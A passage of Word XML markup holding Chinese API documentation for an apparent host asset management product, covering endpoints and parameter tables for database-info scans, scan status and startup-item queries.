          </w:tcPr>
          <w:p w14:paraId="2774932A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E3E84C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F77B96D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>数据库示例名,仅windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1A70E73C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3DCC4B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D32BD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3544D136" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1AC7D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>身份验证,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="480CF6CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7863ACC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22E75EA7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2126EDEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D82A551" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>审核级别,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AB11CAA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="346529B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>sysLogPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27FDDBAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E123EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682C687B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>系统日志路径,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D34FFE7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47A56167" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>mainDbPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E967660" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D47FF10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E10FFE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主数据库路径,仅windows SQL Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="554A1E5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="数据库信息扫描"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:t>数据库信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B4FF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求数据库信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B6A3F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC5B20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/assets/dbinfo/{win|linux}/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0096CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A5BE1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B4C9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36A9A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/dbinfo/linux/refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75165EBA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763CEC38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F1ADB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F5F670" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorCode": 500,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "errorMessage": "no online agent", //      错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "detail":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBE6FA"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588FFD4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1D8D8D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7702AC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C935965" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD94098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69A0DB9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26F57D5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D7456F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078F7557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25953F0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B162CF0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="数据库信息查询扫描状态"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:t>数据库信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC6ECA5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询数据库信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767160A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="启动项信息"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:t>启动项信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695403A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CDEA61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的启动项信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A56813" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48967CC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>启动项信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D3934" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C85D1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA886C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847ACC8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC2D60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25A8F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>启动项信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D01DEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C188275" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用启动项信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351A46F"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4E1E1FAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B1F228" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="启动项信息查询结果"/>
      <w:r>
        <w:t>启动项信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3DF37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询启动项信息，按每台主机每个启动项进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB73664" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE8C5E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/assets/service/{linux/win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744BDD85"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413"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="4121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="41C4C25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D7E1C52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1149F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544E2EFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566D7F98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5082780B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34602819" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EF0C2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58B2933A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C70E75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38BCF2D9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38441A29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27AC5A68" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A151483" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C09911" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79D4CAE7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43BD4839" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F8880EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C71C94" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA025BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3221CE46" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7378FADF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033D4011" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FCF73D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="349ACFC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FD29167" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F32A1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA3C72B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="621CA9A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A4DD83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>启动项名（模糊查询）（仅linux启动项名）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D148A94" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C20F9B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
